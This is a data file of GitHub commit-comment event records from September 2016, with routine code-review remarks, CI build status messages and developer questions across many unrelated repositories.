{"id":"4549111324","type":"CommitCommentEvent","actor":{"login":"cameel"},"repo":{"name":"Code-Poets/sandbox"},"payload":{"comment":{"id":18984271,"position":22,"line":32,"path":"and-kisorec/wikiscraper/views.py","commit_id":"d6a48cbe31a1bc6af6385fab160dff7d5f7bf38d","created_at":"2016-09-12T12:56:34Z","updated_at":"2016-09-12T12:56:34Z","body":"This case will never happen."}},"created_at":"2016-09-12T12:56:34Z"}
{"id":"4549113081","type":"CommitCommentEvent","actor":{"login":"congleetea"},"repo":{"name":"congleetea/.emacs.d"},"payload":{"comment":{"id":18984274,"position":3,"line":4,"path":"vendor/auto-insert/insert.org","commit_id":"20148b1e0559ef2e3e41fc53094de70ea6104986","created_at":"2016-09-12T12:56:57Z","updated_at":"2016-09-12T12:56:57Z","body":"Date"}},"created_at":"2016-09-12T12:56:57Z"}
{"id":"4549113695","type":"CommitCommentEvent","actor":{"login":"cameel"},"repo":{"name":"Code-Poets/sandbox"},"payload":{"comment":{"id":18984277,"position":16,"line":26,"path":"and-kisorec/wikiscraper/views.py","commit_id":"d6a48cbe31a1bc6af6385fab160dff7d5f7bf38d","created_at":"2016-09-12T12:57:05Z","updated_at":"2016-09-12T12:57:05Z","body":"If `len(check_b_tag) > 0 and len(check_dl_tag) > 0` you should return an error."}},"created_at":"2016-09-12T12:57:05Z"}
{"id":"4549115629","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18984284,"position":null,"line":null,"path":null,"commit_id":"106f0883108d4a8151108d55bb6e48e804b8dddd","created_at":"2016-09-12T12:57:27Z","updated_at":"2016-09-12T12:57:27Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 244](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1200&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:14"}},"created_at":"2016-09-12T12:57:27Z"}
{"id":"4549115685","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18984285,"position":null,"line":null,"path":null,"commit_id":"f05ee1ac2279f28ec456d813ca336fc72d51004c","created_at":"2016-09-12T12:57:28Z","updated_at":"2016-09-12T12:57:28Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 245](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1201&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T12:57:28Z"}
{"id":"4549115945","type":"CommitCommentEvent","actor":{"login":"dogoepp"},"repo":{"name":"resibots/libdynamixel"},"payload":{"comment":{"id":18984286,"position":null,"line":null,"path":null,"commit_id":"ca8adec75e6fb35d0d0af8935516762cc50fe22e","created_at":"2016-09-12T12:57:30Z","updated_at":"2016-09-12T12:57:30Z","body":"thanks :)"}},"created_at":"2016-09-12T12:57:30Z"}
{"id":"4549115992","type":"CommitCommentEvent","actor":{"login":"vonjim"},"repo":{"name":"vonjim/Cisco-IOS-Config-Generator"},"payload":{"comment":{"id":18984287,"position":null,"line":null,"path":null,"commit_id":"ed404388dc4eaa2a82a2cbc898dc3ce4e78ed2f8","created_at":"2016-09-12T12:57:31Z","updated_at":"2016-09-12T12:57:31Z","body":"Accept"}},"created_at":"2016-09-12T12:57:31Z"}
{"id":"4549118795","type":"CommitCommentEvent","actor":{"login":"vonjim"},"repo":{"name":"vonjim/Cisco-IOS-Config-Generator"},"payload":{"comment":{"id":18984294,"position":null,"line":null,"path":null,"commit_id":"ed404388dc4eaa2a82a2cbc898dc3ce4e78ed2f8","created_at":"2016-09-12T12:58:06Z","updated_at":"2016-09-12T12:58:06Z","body":"\r\nAccept"}},"created_at":"2016-09-12T12:58:06Z"}
{"id":"4549118935","type":"CommitCommentEvent","actor":{"login":"vonjim"},"repo":{"name":"vonjim/Cisco-IOS-Config-Generator"},"payload":{"comment":{"id":18984295,"position":null,"line":null,"path":null,"commit_id":"ed404388dc4eaa2a82a2cbc898dc3ce4e78ed2f8","created_at":"2016-09-12T12:58:08Z","updated_at":"2016-09-12T12:58:08Z","body":"\r\nAccept"}},"created_at":"2016-09-12T12:58:08Z"}
{"id":"4549119285","type":"CommitCommentEvent","actor":{"login":"stachdude"},"repo":{"name":"stachdude/rabbitmq"},"payload":{"comment":{"id":18984297,"position":null,"line":null,"path":null,"commit_id":"6aead45460df5fb7a73cf61b79a32b638802ee50","created_at":"2016-09-12T12:58:12Z","updated_at":"2016-09-12T12:58:12Z","body":"To configure Depth parameter use `-e RABBITMQ_SSL_DEPTH=<depth>`"}},"created_at":"2016-09-12T12:58:12Z"}
{"id":"4549120321","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"PomeloFoundation/Pomelo.JsonObject"},"payload":{"comment":{"id":18984299,"position":null,"line":null,"path":null,"commit_id":"66523c087b600bf2fdd31df742dbf469662389b0","created_at":"2016-09-12T12:58:24Z","updated_at":"2016-09-12T12:58:24Z","body":"Thanks.  Jetbrains Rider still doesn't do a great job of creating these.  I was hacking them by hand just to get them to load."}},"created_at":"2016-09-12T12:58:24Z"}
{"id":"4549123631","type":"CommitCommentEvent","actor":{"login":"yura321y"},"repo":{"name":"yura321y/testbot"},"payload":{"comment":{"id":18984306,"position":null,"line":null,"path":null,"commit_id":"7e39e0c7166cda4f25bf36a6cb94a5c102020c90","created_at":"2016-09-12T12:59:01Z","updated_at":"2016-09-12T12:59:01Z","body":"eqwrqweqwe"}},"created_at":"2016-09-12T12:59:01Z"}
{"id":"4549123677","type":"CommitCommentEvent","actor":{"login":"ndown"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":18984307,"position":null,"line":null,"path":null,"commit_id":"348cdf88e51b0401c178d71d0756700ba479d37e","created_at":"2016-09-12T12:59:01Z","updated_at":"2016-09-12T12:59:01Z","body":"https://gist.github.com/ndown/127a978856adb5e57db231a2f8a5be09 since the value for parameter depth of _applySortCompare is never incremented by default, the only way that it seems possible to go deep is by returning 0 and therefore invoking the recursive call."}},"created_at":"2016-09-12T12:59:01Z"}
{"id":"4549123719","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984308,"position":15,"line":72,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:59:02Z","updated_at":"2016-09-12T12:59:02Z","body":"Откуда появился элемент <h1 class=\"hide\">Преимущества</h1> ??  "}},"created_at":"2016-09-12T12:59:02Z"}
{"id":"4549128168","type":"CommitCommentEvent","actor":{"login":"BrainsoftLtd"},"repo":{"name":"BrainsoftLtd/ng2-admin"},"payload":{"comment":{"id":18984312,"position":null,"line":null,"path":null,"commit_id":"b76bae21a6398f0af698a4f6c4d30a46532e1615","created_at":"2016-09-12T12:59:55Z","updated_at":"2016-09-12T12:59:55Z","body":"The current state of this is just a wrapper. An electron entry point that shows the current website, exactly as is, in a desktop window. No further integration is there (yet). There are a number of implementations available (like the Electron events service in angular2-seed-advanced, to wrap the Electron IPC, and make it available as a service in Angular."}},"created_at":"2016-09-12T12:59:55Z"}
{"id":"4549129353","type":"CommitCommentEvent","actor":{"login":"XPanniX"},"repo":{"name":"charlesmilette/SearchWithMyBrowser"},"payload":{"comment":{"id":18984314,"position":5,"line":5,"path":"CustomSearchEngine.md","commit_id":"6bfac105be0f9b6f33e51fb19b9e5f4bdf0deaf3","created_at":"2016-09-12T13:00:13Z","updated_at":"2016-09-12T13:00:13Z","body":"This flag seems to be no longer available (Chrome Version 53.0.2785.101), or am I missing something? A while ago that flag worked for me."}},"created_at":"2016-09-12T13:00:13Z"}
{"id":"4549129858","type":"CommitCommentEvent","actor":{"login":"make2514"},"repo":{"name":"yahoo/react-dnd-touch-backend"},"payload":{"comment":{"id":18984317,"position":null,"line":null,"path":null,"commit_id":"26884a4ae913da3521530f85e6567563a1a8df8e","created_at":"2016-09-12T13:00:18Z","updated_at":"2016-09-12T13:00:18Z","body":"Dear Marco,\r\nCould you please explain a bit further on how to use this delay option for touch event?\r\nI assumed that I only need to change delayTouchStart , delayMouseStart values in order for the option to work (and time unit is ms).\r\nI am struggling with making press (taphold) event work using React DnD on mobile.\r\nI would appreciate any insight from you!"}},"created_at":"2016-09-12T13:00:18Z"}
{"id":"4549130713","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984320,"position":19,"line":75,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:00:27Z","updated_at":"2016-09-12T13:00:27Z","body":"здесь картинки лучше подставлять через фон"}},"created_at":"2016-09-12T13:00:27Z"}
{"id":"4549132733","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984322,"position":24,"line":80,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:00:46Z","updated_at":"2016-09-12T13:00:46Z","body":"p - лишняя обертка"}},"created_at":"2016-09-12T13:00:46Z"}
{"id":"4549137203","type":"CommitCommentEvent","actor":{"login":"ViolyS"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":18984327,"position":null,"line":null,"path":null,"commit_id":"2f8de37d53b939898d73551cf9215e276a192d57","created_at":"2016-09-12T13:01:39Z","updated_at":"2016-09-12T13:01:39Z","body":"因为沿用之前贡献过的代码，所以有些贡献的格式就不是很工整。\r\n而且监视的技能收集是一项很繁杂和个性化的事情，有些职业我也没有，例如满级萨满。\r\n所以能提供代码以完善监视功能，对此表示感谢。"}},"created_at":"2016-09-12T13:01:39Z"}
{"id":"4549138334","type":"CommitCommentEvent","actor":{"login":"philipbelesky"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18984331,"position":null,"line":null,"path":null,"commit_id":"f63f18d8417f5ad26520dc639cfab3224a9ee1c6","created_at":"2016-09-12T13:01:53Z","updated_at":"2016-09-12T13:01:53Z","body":"Ping @czlee, I figure at least some of the `DebateTeam` deletions must be coming from the database area. Hopefully these additions should help cut them down."}},"created_at":"2016-09-12T13:01:53Z"}
{"id":"4549141649","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984337,"position":36,"line":90,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:02:31Z","updated_at":"2016-09-12T13:02:31Z","body":"здесь не нужно вложенного span. Элемент можно спокойно вынести из h3,\r\n"}},"created_at":"2016-09-12T13:02:31Z"}
{"id":"4549142430","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18984340,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T13:02:39Z","updated_at":"2016-09-12T13:02:39Z","body":"You don't like views split up?\r\n\r\nTwig can probably include files, but I'd prefer not to activate that functionality."}},"created_at":"2016-09-12T13:02:39Z"}
{"id":"4549146326","type":"CommitCommentEvent","actor":{"login":"koa"},"repo":{"name":"maximilianhuber/fossology"},"payload":{"comment":{"id":18984346,"position":null,"line":null,"path":null,"commit_id":"3372942c54c95e04f65524969ed14ed96069ffcf","created_at":"2016-09-12T13:03:24Z","updated_at":"2016-09-12T13:03:24Z","body":"Where is docker-compose.common.yml?"}},"created_at":"2016-09-12T13:03:24Z"}
{"id":"4549151776","type":"CommitCommentEvent","actor":{"login":"thinkh"},"repo":{"name":"agrawalkushal/agrawalkushal.github.io"},"payload":{"comment":{"id":18984355,"position":13,"line":13,"path":"nesting.html","commit_id":"508fecfe53a137c64962db5cb19845566734454d","created_at":"2016-09-12T13:04:21Z","updated_at":"2016-09-12T13:04:21Z","body":"This code looks incomplete. Please, check the consistency of your parentheses and braces. "}},"created_at":"2016-09-12T13:04:21Z"}
{"id":"4549157780","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18984368,"position":null,"line":null,"path":null,"commit_id":"3585190924deb54cff62bd725958a09859378fba","created_at":"2016-09-12T13:05:29Z","updated_at":"2016-09-12T13:05:29Z","body":"OK, it looks like this check-in finally fixed the issue for i386 and x86_64. I hope we don't have to do this in the future,"}},"created_at":"2016-09-12T13:05:29Z"}
{"id":"4549158118","type":"CommitCommentEvent","actor":{"login":"gunasper"},"repo":{"name":"gunasper/docs.stormwind"},"payload":{"comment":{"id":18984370,"position":null,"line":null,"path":null,"commit_id":"f0ed6e299e00c6977a3040bdfd07c84cf4331d79","created_at":"2016-09-12T13:05:34Z","updated_at":"2016-09-12T13:05:34Z","body":"__API Description file syntax error on line 1__: expected API name, e.g. '# <API Name>' (Autogenerated message from apiary.io)"}},"created_at":"2016-09-12T13:05:34Z"}
{"id":"4549162416","type":"CommitCommentEvent","actor":{"login":"maximilianhuber"},"repo":{"name":"maximilianhuber/fossology"},"payload":{"comment":{"id":18984376,"position":null,"line":null,"path":null,"commit_id":"3372942c54c95e04f65524969ed14ed96069ffcf","created_at":"2016-09-12T13:06:24Z","updated_at":"2016-09-12T13:06:24Z","body":"Sorry, missed that file. I have force pushed the new commit https://github.com/maximilianhuber/fossology/commit/fd868410cb37428988bb12229a68a68b1cc0d17b."}},"created_at":"2016-09-12T13:06:24Z"}
{"id":"4549163480","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/libmateweather"},"payload":{"comment":{"id":18984379,"position":null,"line":null,"path":null,"commit_id":"835055e0d0b950d3f66ad236de7e40942f6f7d8e","created_at":"2016-09-12T13:06:36Z","updated_at":"2016-09-12T13:06:36Z","body":"If you look at the next commit, https://github.com/mate-desktop/libmateweather/commit/c1b71893ec34a2d0ea8f85ce7f30f536f8582123 (which switches to recommended method of data retrieval), you'd see the usage of API that's specific to that server. Could you find some other server that uses exactly the same API?"}},"created_at":"2016-09-12T13:06:36Z"}
{"id":"4549168068","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984386,"position":57,"line":108,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:07:31Z","updated_at":"2016-09-12T13:07:31Z","body":"Здесь не нужно выносить в отдельный блок заголовок, достаточно сделать один section с классом popular-goods и в нем просто будет заголовок и блоки с товарами"}},"created_at":"2016-09-12T13:07:31Z"}
{"id":"4549168597","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18984401,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T13:07:37Z","updated_at":"2016-09-12T13:07:37Z","body":"Have something like this : \r\n```\r\n<ul>\r\n<?php foreach($aSubQuestions as $aSubQuestion){\r\n  echo $this->renderPartial('views.question.multiple.lines',$aSubQuestion['data']);\r\n} ?>\r\n</ul>\r\n```\r\nGreat ! and clear.\r\n\r\nBut : \r\n```\r\n<ul>\r\n<?php \r\n  echo $row;\r\n} ?>\r\n</ul>\r\n```Wher rows is ste in a helper . Not great, not clear .\r\n\r\nI don't know if we can have something like the 1st solution with twig."}},"created_at":"2016-09-12T13:07:37Z"}
{"id":"4549169220","type":"CommitCommentEvent","actor":{"login":"TuJianwei"},"repo":{"name":"TuJianwei/Snakey"},"payload":{"comment":{"id":18984404,"position":2,"line":2,"path":"README.md","commit_id":"71586bd832a30ff5d8a7336e9d31e41766db5384","created_at":"2016-09-12T13:07:45Z","updated_at":"2016-09-12T13:07:45Z","body":"这个工程是贪吃蛇Java小程序，能够实现一些基本的游戏功能"}},"created_at":"2016-09-12T13:07:45Z"}
{"id":"4549170598","type":"CommitCommentEvent","actor":{"login":"russell-taylor"},"repo":{"name":"vrpn/vrpn"},"payload":{"comment":{"id":18984412,"position":null,"line":null,"path":null,"commit_id":"82d52fd67a5c1a637faa241fab66ce3c543b10df","created_at":"2016-09-12T13:08:02Z","updated_at":"2016-09-12T13:08:02Z","body":"You can check out an earlier commit, such as 308839e5b7706e8579aae59e0160d2c45b9c75a3, that does not have this change.  If you can let us know what your operating system is and what your target is (Visual studio version, 32 or 64 bit), we can try to reproduce the issue and fix it."}},"created_at":"2016-09-12T13:08:02Z"}
{"id":"4549171067","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984414,"position":61,"line":114,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:08:09Z","updated_at":"2016-09-12T13:08:09Z","body":"вот здесь как раз можно применить список, потому что все блоки с товарами не что иное как стилизованный список."}},"created_at":"2016-09-12T13:08:09Z"}
{"id":"4549172431","type":"CommitCommentEvent","actor":{"login":"nitay"},"repo":{"name":"ActionIQ/scalastyle-rules"},"payload":{"comment":{"id":18984417,"position":13,"line":6,"path":"src/main/resources/reference.conf","commit_id":"03110d25845f3a8bc03923a8511e29d43363f02d","created_at":"2016-09-12T13:08:24Z","updated_at":"2016-09-12T13:08:24Z","body":"yeah it's a good point. When I ran this on AIQ codebase I got a *lot* more \"false negatives\" than I expected. I do see value in this b/c strictly speaking making sth lazy will prevent very weird errors. At the same time there are many cases where having a non-lazy val is fine. Any ideas for how we can still make some use of this?"}},"created_at":"2016-09-12T13:08:24Z"}
{"id":"4549172444","type":"CommitCommentEvent","actor":{"login":"torstenkraemer"},"repo":{"name":"kduske-n4/DomainModel"},"payload":{"comment":{"id":18984418,"position":16,"line":98,"path":"org.eclipse.xtext.example.domainmodel.tests/src/org/eclipse/xtext/example/domainmodel/tests/FormatterTest.xtend","commit_id":"3a51fa6247ec857265e1b5bb5dbe51d25a739573","created_at":"2016-09-12T13:08:24Z","updated_at":"2016-09-12T13:08:24Z","body":"I'm just curious but in the context of bug https://github.com/eclipse/xtext-core/issues/97 the expectation  for line 97 would be ```entity Foo {```"}},"created_at":"2016-09-12T13:08:24Z"}
{"id":"4549174216","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984423,"position":71,"line":120,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:08:46Z","updated_at":"2016-09-12T13:08:46Z","body":"а здесь список убрать, для кнопок есть теги a,button и input"}},"created_at":"2016-09-12T13:08:46Z"}
{"id":"4549176411","type":"CommitCommentEvent","actor":{"login":"sharissis-brei"},"repo":{"name":"sharissis-brei/cascade-assets"},"payload":{"comment":{"id":18984431,"position":9,"line":217,"path":"app/assets/javascripts/cascade/carousel.js","commit_id":"2b6b045046fc876f4c4e6933e7acdad36a178791","created_at":"2016-09-12T13:09:15Z","updated_at":"2016-09-12T13:09:15Z","body":"Would you be ok with me submitting a PR to test the changes, deploy the changes to the QA CMS, and if the carousel breaks, we can revert?\r\n\r\nOr, if you know of another way to test this out, please let me know. I know you have a certain build system in place, so I didn't want to make any changes inline in the CMS.\r\n\r\nLet me know how you'd like me to proceed."}},"created_at":"2016-09-12T13:09:15Z"}
{"id":"4549177316","type":"CommitCommentEvent","actor":{"login":"martinbudden"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":18984434,"position":null,"line":null,"path":null,"commit_id":"09821b8aa3064b5f7bea7c2d45f81faf3753dd40","created_at":"2016-09-12T13:09:25Z","updated_at":"2016-09-12T13:09:25Z","body":"@hydra ,  can you not use PA4 for the ADC? PA4 is on the NRF24L01 (P8) connector on the board an so precludes using a NRF24L01 receiver (which is my CJMCU setup).\r\n\r\nHow about PB11 (pin2 on P2) instead? That is right next to a VCC pin (pin3 on P2) as well."}},"created_at":"2016-09-12T13:09:25Z"}
{"id":"4549183662","type":"CommitCommentEvent","actor":{"login":"macbre"},"repo":{"name":"Wikia/python-commons"},"payload":{"comment":{"id":18984442,"position":null,"line":null,"path":null,"commit_id":"f082053949ae5bf6ee208980c001637922ae4aed","created_at":"2016-09-12T13:10:41Z","updated_at":"2016-09-12T13:10:41Z","body":":+1: "}},"created_at":"2016-09-12T13:10:41Z"}
{"id":"4549187770","type":"CommitCommentEvent","actor":{"login":"TuJianwei"},"repo":{"name":"TuJianwei/Snakey"},"payload":{"comment":{"id":18984451,"position":null,"line":null,"path":null,"commit_id":"71586bd832a30ff5d8a7336e9d31e41766db5384","created_at":"2016-09-12T13:11:28Z","updated_at":"2016-09-12T13:11:28Z","body":"这个工程是贪吃蛇Java小程序，能够实现一些基本的游戏功能"}},"created_at":"2016-09-12T13:11:28Z"}
{"id":"4549189151","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984454,"position":120,"line":164,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:11:44Z","updated_at":"2016-09-12T13:11:44Z","body":"здесь тоже нужно сделать списком логотипы"}},"created_at":"2016-09-12T13:11:44Z"}
{"id":"4549189392","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984455,"position":12,"line":16,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:11:47Z","updated_at":"2016-09-12T13:11:47Z","body":"nav"}},"created_at":"2016-09-12T13:11:47Z"}
{"id":"4549191163","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984462,"position":12,"line":16,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:12:09Z","updated_at":"2016-09-12T13:12:09Z","body":"menu"}},"created_at":"2016-09-12T13:12:09Z"}
{"id":"4549192739","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984465,"position":154,"line":190,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:12:26Z","updated_at":"2016-09-12T13:12:26Z","body":"Повторюсь - h1 может быть только 1 на странице"}},"created_at":"2016-09-12T13:12:26Z"}
{"id":"4549193364","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984466,"position":13,"line":17,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:12:33Z","updated_at":"2016-09-12T13:12:33Z","body":"a.main-nav__item.main-nav__item--active"}},"created_at":"2016-09-12T13:12:33Z"}
{"id":"4549194557","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18984467,"position":null,"line":null,"path":null,"commit_id":"1ed05c7d65e9e6b28153ea822995b0773fe2c3af","created_at":"2016-09-12T13:12:48Z","updated_at":"2016-09-12T13:12:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 983](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13132&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-12T13:12:48Z"}
{"id":"4549194591","type":"CommitCommentEvent","actor":{"login":"ltGuillaume"},"repo":{"name":"MightyCreak/sonerezh"},"payload":{"comment":{"id":18984468,"position":null,"line":null,"path":null,"commit_id":"88d89752d43ae75f33b3b7afabaed59332e4ba7c","created_at":"2016-09-12T13:12:48Z","updated_at":"2016-09-12T13:12:48Z","body":"Oops, I found problem with the sorting. CakePHP passes on the order via the url for the next pages, but ONLY the first field, so after the first page it's still ordered by band, but not by album name anymore. There's supposed to be a workaround, but I can't seem to find out where it should go in Sonerezh: https://github.com/cakephp/cakephp/issues/7324#issuecomment-218321039"}},"created_at":"2016-09-12T13:12:48Z"}
{"id":"4549197626","type":"CommitCommentEvent","actor":{"login":"lofcz"},"repo":{"name":"lofcz/SimplexRpgEngine"},"payload":{"comment":{"id":18984476,"position":null,"line":null,"path":null,"commit_id":"af16741b6ca2253dfae4b6a2bb1f01fbe7a7cca8","created_at":"2016-09-12T13:13:23Z","updated_at":"2016-09-12T13:13:23Z","body":"**Merged.**"}},"created_at":"2016-09-12T13:13:23Z"}
{"id":"4549198864","type":"CommitCommentEvent","actor":{"login":"ProgrammerDan"},"repo":{"name":"Civcraft/NameLayer"},"payload":{"comment":{"id":18984480,"position":null,"line":null,"path":null,"commit_id":"e6270af6c986010013204ac8eaba67c13c535d90","created_at":"2016-09-12T13:13:38Z","updated_at":"2016-09-12T13:13:38Z","body":"Yeah incomplete. Ran out of awake."}},"created_at":"2016-09-12T13:13:38Z"}
{"id":"4549199363","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18984484,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T13:13:42Z","updated_at":"2016-09-12T13:13:42Z","body":"Indeed, as I tried to explain many times (so many debates...), the \"echo $row\" way of doing is closer to most template engine system. It will fit perfectly for an engine like twig. "}},"created_at":"2016-09-12T13:13:42Z"}
{"id":"4549199967","type":"CommitCommentEvent","actor":{"login":"jacksonic"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":18984486,"position":5,"line":820,"path":"src/foam/dao/dao.js","commit_id":"f2eb5951f7ecebdeab95f46696f0f83f37017073","created_at":"2016-09-12T13:13:49Z","updated_at":"2016-09-12T13:13:49Z","body":"Testing only, will remove"}},"created_at":"2016-09-12T13:13:49Z"}
{"id":"4549201590","type":"CommitCommentEvent","actor":{"login":"devrakeshkumar"},"repo":{"name":"devrakeshkumar/TestRepo"},"payload":{"comment":{"id":18984493,"position":2,"line":2,"path":"One More File","commit_id":"c4c6c2c219578143598884f4b6df22dc3b920cee","created_at":"2016-09-12T13:14:10Z","updated_at":"2016-09-12T13:14:10Z","body":"You need to change this line"}},"created_at":"2016-09-12T13:14:10Z"}
{"id":"4549202983","type":"CommitCommentEvent","actor":{"login":"martinjhnhadley"},"repo":{"name":"ox-it/OxfordIDN_htmlwidgets"},"payload":{"comment":{"id":18984498,"position":null,"line":null,"path":null,"commit_id":"3a12418a50680560f3db8dd9a0b4f5daf5c5a29e","created_at":"2016-09-12T13:14:24Z","updated_at":"2016-09-12T13:14:24Z","body":"This fixed https://github.com/ox-it/OxfordIDN_htmlwidgets/issues/47"}},"created_at":"2016-09-12T13:14:24Z"}
{"id":"4549206743","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984507,"position":156,"line":211,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:15:09Z","updated_at":"2016-09-12T13:15:09Z","body":"Неправильно размечен блок - features-services-slide - во первых это не списки, во вторых так не разделяют - 1 таб - 1 список с 1 пунктом - это неверно."}},"created_at":"2016-09-12T13:15:09Z"}
{"id":"4549211067","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984520,"position":16,"line":20,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:15:54Z","updated_at":"2016-09-12T13:15:54Z","body":".nav__menu-link"}},"created_at":"2016-09-12T13:15:54Z"}
{"id":"4549215230","type":"CommitCommentEvent","actor":{"login":"kalletlak"},"repo":{"name":"zhx828/iViz"},"payload":{"comment":{"id":18984535,"position":15,"line":56,"path":"app/scripts/main.js","commit_id":"26f5f95f6f64a7b8c8c7cd194c53b2f1ad2d53c7","created_at":"2016-09-12T13:16:40Z","updated_at":"2016-09-12T13:16:40Z","body":"That wasn't expected. Before doing changes for partially loading clinical data we were actually validating for undefined and setting them to 'NA'. Since we removed this validation and doing this at the time of creating dimension, we need to update this to check for undefined values and set them to 'NA'."}},"created_at":"2016-09-12T13:16:40Z"}
{"id":"4549218833","type":"CommitCommentEvent","actor":{"login":"dieris"},"repo":{"name":"BBN-Q/Qlab"},"payload":{"comment":{"id":18984545,"position":null,"line":null,"path":null,"commit_id":"b66297b3990833459e0075f93437a4f5df5dea4b","created_at":"2016-09-12T13:17:23Z","updated_at":"2016-09-12T13:17:23Z","body":"@Evan-Walsh @caryan Not sure what happened, but something went wrong when pushing this commit. The history of 2 years of commits were merged onto a single one! "}},"created_at":"2016-09-12T13:17:23Z"}
{"id":"4549219329","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18984547,"position":null,"line":null,"path":null,"commit_id":"7f750b7c68f3a27fee8c2dbe52c381c2640c6c56","created_at":"2016-09-12T13:17:28Z","updated_at":"2016-09-12T13:17:28Z","body":"@xsuchy, @clime  Shouldn't we rather delegate srpm creation to builders?  Creating srpm is non-trivial task and with huge amount of package builds creating srpms on dist-git machine might lead to DoS.  Using builders should scale better ..."}},"created_at":"2016-09-12T13:17:28Z"}
